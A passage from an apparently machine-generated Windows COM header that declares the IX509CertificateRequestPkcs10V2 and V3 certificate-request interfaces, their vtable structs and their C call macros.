    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestPkcs10V2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs10V2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V3_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10V3_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10V3 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10V3;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("54EA9942-3D66-4530-B76E-7C9170D3EC52")
    IX509CertificateRequestPkcs10V3 : public IX509CertificateRequestPkcs10V2
    {
    public:
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AttestPrivateKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AttestPrivateKey( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AttestationEncryptionCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AttestationEncryptionCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionStrength( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ChallengePassword( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ChallengePassword( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10V3Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10V3 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestPkcs10V3 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10V3Vtbl;

    interface IX509CertificateRequestPkcs10V3
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10V3Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10V3_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10V3_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10V3_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10V3_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10V3_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10V3_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10V3_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10V3_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10V3_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10V3_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10V3_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10V3_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

